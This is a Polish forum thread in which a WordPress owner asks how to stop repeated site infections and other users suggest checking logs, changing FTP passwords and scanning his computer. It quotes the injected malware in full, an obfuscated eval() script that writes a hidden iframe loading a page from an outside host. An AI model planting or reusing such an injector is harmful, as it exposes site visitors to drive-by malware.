Strona została zainfekowana

[Dexieco 6]

Witacje,

 

mam WordPressa najnowszego, od jakiegoś czasu google blokuje mi witrynę ponieważ strona została zainfekowana. Reinstalacje, czyszczenie, stawianie różnych pluginów zabezpieczającyh itp. nie pomaga.

Teraz na tyle to jest uciążwliwe, że godzine po czystej reinstalacji jest znowu to samo. Jak zabezpieczyć templatkę/skrypt aby coś nie wstrzykiwało mi kodu w nią. Do tego tworzy dużo plików losowych w katalogu public_html, np. aciah1.php, a w nim

<?php
echo "42";
?> 

Oto kod podany przez google

<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|jagesxij|width|info||php|tag2|ram'.split('|'),0,{}))</script>

Jak się przed tym bronić, zabezpieczyć ?

[blfr 225]

Gdzie tego Wordpressa hostujesz? Masz inne strony na tym samym koncie?

 

Albo nie czyścisz do końca poprzedniej infekcji, albo masz dziurawy plugin. Ewentualnie właśnie inny podatny skrypt. I w końcu sam serwer może nie być bezpieczny.

[Dexieco 6]

Hosting JOI, inne strony mam też na tym koncie i nic się nie dzieje.
Sęk w tym że nawet na standardowej templatce to samo się dzieje po kilku dniach. Teraz miałem tylko czysty WP i do tego login-lockdown, secure-wordpress, oraz moja templatka. i w sumie 2 dni i rano to samo znowu. Już nie mam sił do tego. Gdzieś pisali, że odpowiada za to plugin w czystym WP SimplePie, ale i on został usunięty i to samo .

[behemoth 230]

A hasło do ftp zmieniłeś?

[regdos 1848]

Logi Twoim przyjacielem i apache i ftp. Sprawdzasz kiedy pliki zostały zmienione i szukasz czy ktoś Ci się łączy przez ftp, czy nie ma jakiś POST-ów na WP.

[bybunny 540]

Hosting JOI, inne strony mam też na tym koncie i nic się nie dzieje.

Sęk w tym że nawet na standardowej templatce to samo się dzieje po kilku dniach. Teraz miałem tylko czysty WP i do tego login-lockdown, secure-wordpress, oraz moja templatka. i w sumie 2 dni i rano to samo znowu. Już nie mam sił do tego. Gdzieś pisali, że odpowiada za to plugin w czystym WP SimplePie, ale i on został usunięty i to samo .

Nie wygląda to fajnie, szczerze to warto przejrzeć logi. Linijka po linijce lub zgłosić to do wsparcia technicznego. Ze swojej strony stosujemy coś takiego jak WordPress Toolkit security management spisuje się świetnie i jak na razie odpukać nikt nam niczego nie zgłaszał. Inna sprawa może spróbuj umieścić stronę za cloudflare.

[Dexieco 6]

Problem jest chyba gorszy do rozwiązania, od czasu wystąpenia infekcji, podstawiony zwykła strona w .html, dziś znów strona zainfekowana, hasła do FTP były zmieniane itd. nie mam już pomysłów, inne strony przeniesione i wykasowane z tego konta i to samo .

[behemoth 230]

To może w takim razie kwestia Twojego komputera. Zapisujesz hasła w kliencie ftp?

Odpal Malwarebytes i eset online scan. Może to Tobie coś się przypałętało.

[bybunny 540]

To może w takim razie kwestia Twojego komputera. Zapisujesz hasła w kliencie ftp?

Odpal Malwarebytes i eset online scan. Może to Tobie coś się przypałętało.

Tak to dokładnie wygląda że coś siedzi na komputerze klienta a nie na usłudze.

[Dexieco 6]

No i lapek przeskanowany, ani 1 ani 2 nie znalazło obecności ciał obcych. Dziwne bo posiadam 2 serwery w tej firmie, i logując się na 2 gdzie są Wordpressy nic się nie dzieje.

[regdos 1848]

Jeszcze raz logi. Sprawdź czy infekcja jest przez ftp czy przez jakąś dziurę w WP.

[monaviepolska 0]

Dexieco

też mi sie wydaje ,że masz jakiś syf na pc. Najlepiej to przywróć starą kopie bezpieczeństwa strony.

No i obserwuj logi. Oczywiście najlepiej to przeczyść cały komputer.